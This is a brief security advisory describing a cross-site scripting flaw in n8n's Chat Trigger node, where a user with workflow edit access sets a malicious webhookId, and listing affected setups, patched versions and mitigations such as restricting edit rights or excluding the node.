n8n Chat Trigger XSS via webhookId Injection

An authenticated user with workflow edit access can inject arbitrary JavaScript into the Chat Trigger's generated page by setting a malicious webhookId. When a logged-in user visits the chat URL, the injected code executes in the n8n origin with that user's session privileges.

All n8n instances using the Chat Trigger node, where users have workflow edit access.

Upgrade to n8n version 1.123.55, 2.25.7, or 2.26.2 or later. If immediate upgrade is not possible, limit workflow creation/editing permissions to trusted users and disable the Chat Trigger node via NODES_EXCLUDE.